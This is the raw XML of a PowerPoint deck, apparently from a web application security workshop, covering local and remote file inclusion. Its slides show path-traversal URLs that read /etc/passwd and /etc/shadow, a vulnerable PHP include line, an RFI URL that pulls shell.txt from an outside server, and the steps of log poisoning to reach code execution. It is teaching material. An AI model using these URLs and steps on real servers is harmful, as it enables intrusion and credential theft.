          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1769021" y="2744152"/>
        <a:ext cx="4723853" cy="15316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8CAB2-C5E7-44DD-9EE2-85BACE6F4C66}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2118"/>
          <a:ext cx="6492875" cy="10739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538B89-3EE0-4CBE-96C6-0CB2587FB7E9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="324863" y="243752"/>
          <a:ext cx="590660" cy="5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DD3A92-8CE6-4469-9681-FA8DB1ED0077}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1240387" y="2118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Make a request to the server and include a PHP shell in the request.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1240387" y="2118"/>
        <a:ext cx="5252487" cy="1073928"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{808CCB7E-DB94-4610-9C81-292825DFEF61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1344530"/>
          <a:ext cx="6492875" cy="10739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933C2F-35A5-4E6D-93AC-D1CF95B91306}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="324863" y="1586164"/>
          <a:ext cx="590660" cy="5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AE0DA2-F359-4939-9FEE-621D18F8DE7C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1240387" y="1344530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Eg through the User-Agent string, any header will do!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1240387" y="1344530"/>
        <a:ext cx="5252487" cy="1073928"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{956DB420-7BFE-41C4-ABDB-C013A1A9FEAD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2686941"/>
          <a:ext cx="6492875" cy="10739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C34A1B-934E-4D43-915D-6CEA03B2B9BB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="324863" y="2928575"/>
          <a:ext cx="590660" cy="5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CD59CF-01EA-47B9-94F9-FDF9CA3F62E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1240387" y="2686941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Browse to the log via the LFI vulnerability</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1240387" y="2686941"/>
        <a:ext cx="5252487" cy="1073928"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DAADC582-CEED-4CE7-8DCD-F7BC0BDE788F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4029352"/>
          <a:ext cx="6492875" cy="10739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5FCFE8-7D4F-4DCA-A599-C62FB0583F12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="324863" y="4270986"/>
          <a:ext cx="590660" cy="5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90F1C-BCA7-4BAA-AE61-E60625AD573D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1240387" y="4029352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Achieve code execution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1240387" y="4029352"/>
        <a:ext cx="5252487" cy="1073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2BD5-D9F3-41DA-B557-6AF7054C3B9B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76A5-170C-410A-8A72-FEEAF706F5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17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886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41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588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541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188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100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811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806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300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48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1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752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198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9830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26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11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14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243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00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587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20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018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036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2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0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2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10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?page=../../../etc/passw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ample.com/?page=../../../var/log/apache/access.log" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/?page=../../../etc/shado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index.php?fn=http://myserver.com/shell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?page=../../../var/log/apache/access.lo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5E457-20A6-4410-BD15-F04118F90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1913" r="36559" b="9091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5D8A86-393E-B547-98E5-6DC4D8021A74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7286776" y="1490895"/>
            <a:ext cx="4042553" cy="114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Workshop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F3D87-A43B-294B-AA32-A17190A216D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7437407" y="2687637"/>
            <a:ext cx="434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Web application security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28189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2B7C8-FEA0-864C-ADA6-BC59466D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File inclusion vulnerabilities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D43E-1DA8-7B4F-B648-EEEF72FE4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US" sz="2000"/>
              <a:t>http://example.com/index.php?fn=upload.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;?php include( $fn ); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225118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4EE04B-3143-214C-BAE1-3EAD3517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699" y="118428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Local file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31D7-B41B-A84F-B39A-A0090D28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0" y="1734697"/>
            <a:ext cx="9272685" cy="2719193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3200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://example.com/?page=../../../etc/passwd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>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://example.com/?page=../../../etc/shadow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5"/>
              </a:rPr>
              <a:t>http://example.com/?page=../../../var/log/apache/access.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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1259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7C3C78-9B15-4140-B596-FE37CA85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98" y="437925"/>
            <a:ext cx="8174971" cy="8633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RFI – Remote file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81C8-D6F6-EA49-9F0C-46B0A692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73" y="2171728"/>
            <a:ext cx="9867549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3"/>
              </a:rPr>
              <a:t>http://example.com/index.php?fn=http://myserver.com/shell.txt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8F4C8-EF42-3544-9229-6862C71CFB2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616221" y="4026051"/>
            <a:ext cx="625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Remote file is processed by the server!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84355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FD9FF-B03F-7B4F-A99A-5B79FB27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do we put in shell.txt?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569155-ED3C-4DF8-A4A2-729AA1307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36496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54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4DD01E-90EC-754F-90FB-64A76BD6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Basic RCE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A5308F-F7A8-294B-B675-8A2A06EEB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8191" y="2963272"/>
            <a:ext cx="9956228" cy="9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34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5AB88-643D-8945-934F-800076BC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2491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851618-B858-8E45-9D77-D19E5ED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LFI to RCE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80D0-D0A1-0B43-B6DE-E4AC8BFB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75" y="2895305"/>
            <a:ext cx="10522933" cy="870783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://example.com/?page=../../../var/log/apache/access.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> ???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419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6146-5B0D-9E4E-A5A7-6989B234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56409A-96DB-B642-9CEE-7AE3D4B7B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111" y="339564"/>
            <a:ext cx="9223378" cy="58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7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EB44F-BB53-A948-A36F-7F135D0E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attack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AE4FD-9206-467A-ACF7-37AEDBE74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2326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2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D90F-459B-774F-B087-97AFD887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45C6-0150-A545-BDEB-2CADE472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9B402-1FB3-E745-8068-764770DA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will we cover today?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7A53A7-6CC5-446D-AC5A-5B954EB01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98337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25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8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2852CD-C9A9-9546-9BD5-C46C92DC5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906" y="541782"/>
            <a:ext cx="8953500" cy="5372100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:softEdge rad="571500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418101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8303E5C-54D1-4485-AC50-FB5046215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21988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865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8464F-2D84-E645-8437-05748830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Installation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594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68F546-85A9-2343-85E1-B5D9E988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Basic Principles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36EB0F6-D1B5-47AF-90DB-657F58765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64249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69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CF91C-F7A5-CC48-8405-01D3E53B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Server side attacks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D83CC-A630-4721-A5B2-3CFB22291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25467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09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0200A-EA34-4342-B05A-5FC7E229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Client side attacks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CD63CF-CFC6-445E-ADE1-51E3DB05B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33731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00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4FD4F-88B5-F349-B9B2-C1929BDF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Today’s focus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6FD362-0DD0-4F94-8067-FE8B371F9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60285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774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Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>64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</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What will we cover today?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Installation and configuration</vt:lpstr>
      <vt:lpstr>Basic Principles </vt:lpstr>
      <vt:lpstr>Server side attacks</vt:lpstr>
      <vt:lpstr>Client side attacks</vt:lpstr>
      <vt:lpstr>Today’s focus</vt:lpstr>
      <vt:lpstr>File inclusion vulnerabilities </vt:lpstr>
      <vt:lpstr>Local file inclusion</vt:lpstr>
      <vt:lpstr>RFI – Remote file inclusion</vt:lpstr>
      <vt:lpstr>What do we put in shell.txt?</vt:lpstr>
      <vt:lpstr>Basic RCE</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>LFI to RCE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The attack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Stephenson</dc:creator>
  <cp:lastModifiedBy>John Stephenson</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-13T02:37:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-13T02:38:23Z</dcterms:modified>
</cp:coreProperties>
</file>